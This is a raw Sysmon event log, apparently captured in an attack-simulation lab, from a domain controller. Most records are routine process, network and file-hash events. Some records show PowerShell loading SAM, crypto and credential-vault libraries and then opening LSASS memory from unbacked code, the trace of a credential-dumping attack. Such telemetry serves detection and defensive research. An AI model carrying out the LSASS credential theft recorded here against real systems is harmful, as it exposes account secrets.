20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035027Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035026Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035025Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035024Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035023Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035022Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035021Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035020Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035019Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035018Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035017Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035016Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035015Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.371{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035014Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.371{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035013Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.371{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-84F3-6042-5C06-00000000AD01}4068C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000035039Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.219{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61919-false10.0.1.12-8000- 354300x800000000000000035041Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.750{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local61920-true0:0:0:0:0:0:0:1win-dc-725.attackrange.local389ldap 354300x800000000000000035040Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.749{CB3070D7-79A8-6042-2A00-00000000AD01}3068C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-725.attackrange.local61920-true0:0:0:0:0:0:0:1win-dc-725.attackrange.local389ldap 734700x800000000000000035045Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:35.943{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WinSCard.dll10.0.14393.2273 (rs1_release_1.180427-1811)Microsoft Smart Card APIMicrosoft® Windows® Operating SystemMicrosoft Corporationwinscard.dllMD5=85E2B5FCB057B0476687CCFE28E589A5,SHA256=4B99A7709FAC8E9CF95AA186651BE455C0998414E2D2D807DF1B000EB26FBD15,IMPHASH=8E9831D203C36A499228D7F02C6B90D8trueMicrosoft WindowsValid 734700x800000000000000035044Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:35.943{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\hid.dll10.0.14393.0 (rs1_release.160715-1616)Hid User LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationhid.dllMD5=DDEB02D7BCB0A346600A3160203C2C95,SHA256=77FD468B4C46A75312426E4368389057EFED233844CF1BC8468983EEC160F178,IMPHASH=A3D80A73BEB6EED1400E993AE6A5B1C3trueMicrosoft WindowsValid 734700x800000000000000035043Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:35.927{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\samlib.dll10.0.14393.0 (rs1_release.160715-1616)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=4C413FEDB1B88DA18059890CE0BC95D1,SHA256=FAD279CE82D1616A533D6E5D3A20543B51FDBDDE4C764E09F6A01C8B0E44218A,IMPHASH=BF11630905AADA27934CD5411323FA5BtrueMicrosoft WindowsValid 734700x800000000000000035042Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:35.916{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035049Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:36.090{CB3070D7-8517-6042-7E06-00000000AD01}69567108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\system32\lsass.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001D526126BC7) 734700x800000000000000035048Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:36.090{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vaultcli.dll10.0.14393.4169 (rs1_release.210107-1130)Credential Vault Client LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationvaultcli.dllMD5=3A4413FEB384CA47420B1A7CB9099BF0,SHA256=338D718FF68D1ACF8AFC366E923B44128E821DDD50A9C282A5F55502BAF288FA,IMPHASH=E0B17C1B749544B11E7164BC8880263EtrueMicrosoft WindowsValid 10341000x800000000000000035047Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:36.090{CB3070D7-7997-6042-0B00-00000000AD01}628848C:\Windows\system32\lsass.exe{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035046Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:36.090{CB3070D7-7997-6042-0B00-00000000AD01}628848C:\Windows\system32\lsass.exe{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000035052Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:37.894{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F28EBE4DA0107F9A48E39E0FC26479FE,SHA256=2E15EFFD786448DAF11BD2520139E821EA5312E796B7A2614D0CA74F084B3662,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035051Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:37.894{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A36932217BA7238A4CEC109FAA41D64,SHA256=91D7FFF094CCC47B91444C6C6C33AE40018EE989A1761CE9574AF1079846A83E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035050Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:37.894{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A44B36F3A605930CCB54A26F96C33299,SHA256=F76D22DB60168CB3345B58D1E3EBDF5324F19E1FDAEC5D04677209F9480FFE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035056Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:38.496{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=733D4C64B1F5F069BAAF23A8AA821BF1,SHA256=954A46AAB95954B6365D7971A4530FB332F977C84B954E9956F5D559B0028D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035055Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:38.496{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=511401CC597C53A1E2CCD795506E08FF,SHA256=BC1211DE991A42C5AA02BABC6B89FF3F1A5D441BDB4F495DD8DBAD09D3787BF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035054Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:38.496{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899C50C19C947F3D49F33A86F3769A38,SHA256=7606EED08B0173AE6863FC8195A310B7FA3F0C4FB44DF4E1C24987148FACAB04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035053Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:38.496{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F28EBE4DA0107F9A48E39E0FC26479FE,SHA256=2E15EFFD786448DAF11BD2520139E821EA5312E796B7A2614D0CA74F084B3662,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000035058Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:35.465{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61921-false10.0.1.12-8000- 23542300x800000000000000035057Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:39.097{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C8ADD0E178A953FBF7EF30E5D98DEB,SHA256=BA8F7215E977EF9FA168163523010FB6685E2D6A0505526D931AA1A6C4E39C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035059Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:40.300{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EE165AA0B79B61073CDE26A84AF005,SHA256=E93ED4C58B2E6CDCF3CB884904C5A0E23A74BF32F18C45ECCF48E55128A24101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035060Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:41.566{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CADB4B5F1F64FC4AD0A9B61A1B8274FA,SHA256=9A6BE18CD542401F3F41FF4E8D6184D0F1F2F0866221BF629403EF1B5BBF5FE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035061Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:42.722{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=647582C9F4BCA72678BC74239B185454,SHA256=399F6A8FFFDA605B66817F35BDE371DD4BB9582D2ED74EA2BD6DB0E96F03AF49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035062Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:43.889{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2376D90B299236F5BD93219490DB5A83,SHA256=6F078B768C35811A244821EB3FE67682B4FCD0381CC3AC13D3E8AC1B8EB54F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035065Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:44.474{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EFA530F0CF926120B53A3A3282CB6C37,SHA256=5D391B16BB5E823D21E3131334C55991CE6B0CAFAB012E064B75D6753D177D1A,IMPHASH=00000000000000000000000000000000falsetrue 